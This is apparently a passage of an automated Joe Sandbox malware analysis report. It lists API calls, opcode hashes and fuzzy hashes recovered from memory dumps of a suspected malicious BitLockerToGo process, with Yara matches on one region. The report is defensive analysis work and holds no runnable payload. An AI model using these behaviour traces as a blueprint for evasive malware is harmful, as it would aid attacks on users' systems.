                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4069420150-0
                                                                                                                                                                • Opcode ID: bfd34c98b357edc9098162fbe8c1ca41703a8d5d4611d1c68e418edafe1390d5
                                                                                                                                                                • Instruction ID: 1279f05af6b90dd75566a259d2f40438e684e118421bb2a3b7fd7f5ee56e4753
                                                                                                                                                                • Opcode Fuzzy Hash: bfd34c98b357edc9098162fbe8c1ca41703a8d5d4611d1c68e418edafe1390d5
                                                                                                                                                                • Instruction Fuzzy Hash: 1D411AB1A087849BD320CF29C04079AFBE5BFC9754F108A2EE8E887750E7709445CB83
                                                                                                                                                                APIs
                                                                                                                                                                • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CCBDA31,00100000,?,?,00000000,?), ref: 6CCCCDA4
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                  • Part of subcall function 6CCCD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CCCCDBA,00100000,?,00000000,?,6CCBDA31,00100000,?,?,00000000,?), ref: 6CCCD158
                                                                                                                                                                  • Part of subcall function 6CCCD130: InitializeConditionVariable.KERNEL32(00000098,?,6CCCCDBA,00100000,?,00000000,?,6CCBDA31,00100000,?,?,00000000,?), ref: 6CCCD177
                                                                                                                                                                • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CCBDA31,00100000,?,?,00000000,?), ref: 6CCCCDC4
                                                                                                                                                                  • Part of subcall function 6CCC7480: ReleaseSRWLockExclusive.KERNEL32(?,6CCD15FC,?,?,?,?,6CCD15FC,?), ref: 6CCC74EB
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CCBDA31,00100000,?,?,00000000,?), ref: 6CCCCECC
                                                                                                                                                                  • Part of subcall function 6CC8CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC8CAA2
                                                                                                                                                                  • Part of subcall function 6CCBCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CCCCEEA,?,?,?,?,00000000,?,6CCBDA31,00100000,?,?,00000000), ref: 6CCBCB57
                                                                                                                                                                  • Part of subcall function 6CCBCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CCBCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CCCCEEA,?,?), ref: 6CCBCBAF
                                                                                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CCBDA31,00100000,?,?,00000000,?), ref: 6CCCD058
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 861561044-0
                                                                                                                                                                • Opcode ID: 6942e21c7ce60b1850ed61040956b42a072235467028133a7a7beba7b88275eb
                                                                                                                                                                • Instruction ID: f2ebf9711941e97ca7b82fbc3d5cc9deaf30aa43217ea3f4b2d019d95c9bf037
                                                                                                                                                                • Opcode Fuzzy Hash: 6942e21c7ce60b1850ed61040956b42a072235467028133a7a7beba7b88275eb
                                                                                                                                                                • Instruction Fuzzy Hash: 8CD15E71B04B469FD708CF28C480799B7F1BF99308F01866DD85987752EB31E9A5CB82
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 03018B60: GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0300D481
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300D698
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300D6AC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0300D72B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 211194620-0
                                                                                                                                                                • Opcode ID: 0415c89a3ae33c438ea5abce487d2d1c3c10cbcfe5f846d704eeb77bcd01da66
                                                                                                                                                                • Instruction ID: c80ceb08a6757cdcda42f9b15c2bb360cd2fd2c48e8060a09c27a70525aa39af
                                                                                                                                                                • Opcode Fuzzy Hash: 0415c89a3ae33c438ea5abce487d2d1c3c10cbcfe5f846d704eeb77bcd01da66
                                                                                                                                                                • Instruction Fuzzy Hash: 4A91367AA532089BDB04FBA0DD94DEE7338AF94210F508169E5177B090EF746A5ECB70
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount64.KERNEL32 ref: 6CC95D40
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFF688), ref: 6CC95D67
                                                                                                                                                                • __aulldiv.LIBCMT ref: 6CC95DB4
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFF688), ref: 6CC95DED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 557828605-0
                                                                                                                                                                • Opcode ID: e92209d9c11569c6e73c645ebee8f96cd156ea0d07144556d27993cd4e21357c
                                                                                                                                                                • Instruction ID: 0bdc3f6afbccd61181d64fd6ca513c82b589f29cdd60c458609c4df02a1829f8
                                                                                                                                                                • Opcode Fuzzy Hash: e92209d9c11569c6e73c645ebee8f96cd156ea0d07144556d27993cd4e21357c
                                                                                                                                                                • Instruction Fuzzy Hash: 0C516072E001198FCF08CF68D954AAEBBB2FF85305F19865DD821A7750DB31A945CB90
                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7CEBD
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC7CEF5
                                                                                                                                                                • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC7CF4E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 438689982-4108050209
                                                                                                                                                                • Opcode ID: f0b2160d50ccb2f0f9bd73950f22f0190a2622d2427e390dea2b1227716a59b0
                                                                                                                                                                • Instruction ID: f5ef178f2d7c80579665bd15042f7c1641a3d541b933a0e186324adf8fb5e274
                                                                                                                                                                • Opcode Fuzzy Hash: f0b2160d50ccb2f0f9bd73950f22f0190a2622d2427e390dea2b1227716a59b0
                                                                                                                                                                • Instruction Fuzzy Hash: 1251F175A0025A8FCB10CF19C890AAABBB5FF99304F19859DD8595F352E731ED06CBE0
                                                                                                                                                                APIs
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CCB82BC,?,?), ref: 6CCB649B
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCB64A9
                                                                                                                                                                  • Part of subcall function 6CCAFA80: GetCurrentThreadId.KERNEL32 ref: 6CCAFA8D
                                                                                                                                                                  • Part of subcall function 6CCAFA80: AcquireSRWLockExclusive.KERNEL32(6CCFF448), ref: 6CCAFA99
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCB653F
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCB655A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3596744550-0
                                                                                                                                                                • Opcode ID: 322b7a1dd36669f880507c1ec4d88034620c50813f93420a46d8317c0fad6a33
                                                                                                                                                                • Instruction ID: 12a830451a5897b3b1fbd323b5e2554cd07c92972b97c29b498d52314f7ea272
                                                                                                                                                                • Opcode Fuzzy Hash: 322b7a1dd36669f880507c1ec4d88034620c50813f93420a46d8317c0fad6a33
                                                                                                                                                                • Instruction Fuzzy Hash: 0F3170B5A047059FD704CF14D884A9EBBF4FF89314F00842EE85A97741EB34E919CB92
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 030194EB
                                                                                                                                                                  • Part of subcall function 03018D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0301951E,00000000), ref: 03018D5B
                                                                                                                                                                  • Part of subcall function 03018D50: RtlAllocateHeap.NTDLL(00000000), ref: 03018D62
                                                                                                                                                                  • Part of subcall function 03018D50: wsprintfW.USER32 ref: 03018D78
                                                                                                                                                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 030195AB
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 030195C9
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 030195D6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3729781310-0
                                                                                                                                                                • Opcode ID: 1529c2d3c76bafc2deb09a14f73bdea6e9492eb52516f6e45dcf7de5d02c7bc3
                                                                                                                                                                • Instruction ID: 2700c2f92dd6698e3ce89763e8f5e753a545240fa5574d1a87ddfe1a73068e4f
                                                                                                                                                                • Opcode Fuzzy Hash: 1529c2d3c76bafc2deb09a14f73bdea6e9492eb52516f6e45dcf7de5d02c7bc3
                                                                                                                                                                • Instruction Fuzzy Hash: D5313A75E4130CAFDB14DFE0DD58BEDB7B8EB44700F108459E506AA188DB74AA89CB91
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CC8B4F5
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CC8B502
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CC8B542
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CC8B578
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2047719359-0
                                                                                                                                                                • Opcode ID: 40a7bd17f93eb3ff2c60e63c1f47a57743f1941e4c1d4e1f46dfd2ed2d04e7ba
                                                                                                                                                                • Instruction ID: 4729c6ef2f82f8f9b7e6771e148d5d1eb8f4e382e5b2911fb231c41e4e1748ba
                                                                                                                                                                • Opcode Fuzzy Hash: 40a7bd17f93eb3ff2c60e63c1f47a57743f1941e4c1d4e1f46dfd2ed2d04e7ba
                                                                                                                                                                • Instruction Fuzzy Hash: EE11CD30A04B45CBD3118F29D8107A6BBB0FF9A319F10970AE89953E01FBB1A5C5C790
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,03020E00,00000000,?), ref: 030179B0
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 030179B7
                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,03020E00,00000000,?), ref: 030179C4
                                                                                                                                                                • wsprintfA.USER32 ref: 030179F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 377395780-0
                                                                                                                                                                • Opcode ID: b1243a3f52cf9e9b67c28db18ffbd18f6892c1804c5706b29ac8a397dece58ac
                                                                                                                                                                • Instruction ID: bdaf6a6cad3bd927fc0163ed829b64177fa67f6e00e4549a3a39d3089a5246b4
                                                                                                                                                                • Opcode Fuzzy Hash: b1243a3f52cf9e9b67c28db18ffbd18f6892c1804c5706b29ac8a397dece58ac
                                                                                                                                                                • Instruction Fuzzy Hash: DD113CB2944118ABCB14DFC9E949BBFB7F8FB4CB11F00421AF605A2284D3795940CBB0
                                                                                                                                                                APIs
                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC7F20E,?), ref: 6CCB3DF5
                                                                                                                                                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC7F20E,00000000,?), ref: 6CCB3DFC
                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCB3E06
                                                                                                                                                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CCB3E0E
                                                                                                                                                                  • Part of subcall function 6CCACC00: GetCurrentProcess.KERNEL32(?,?,6CC731A7), ref: 6CCACC0D
                                                                                                                                                                  • Part of subcall function 6CCACC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC731A7), ref: 6CCACC16
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2787204188-0
                                                                                                                                                                • Opcode ID: d5c3dcc09e73242bfa3942b2813752d98bddd3d9addc906b936906ac31aa05fe
                                                                                                                                                                • Instruction ID: 82b9bba028b9344da144a8de2b2b77b39de412d89c31fc81c216abe9db2d4192
                                                                                                                                                                • Opcode Fuzzy Hash: d5c3dcc09e73242bfa3942b2813752d98bddd3d9addc906b936906ac31aa05fe
                                                                                                                                                                • Instruction Fuzzy Hash: 8BF0FEB1A402087BE700AB94EC85DAB377DDF46628F050021FD1957741E635BE1686F6
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(03013AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,03013AEE,?), ref: 030192FC
                                                                                                                                                                • GetFileSizeEx.KERNEL32(000000FF,03013AEE), ref: 03019319
                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 03019327
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
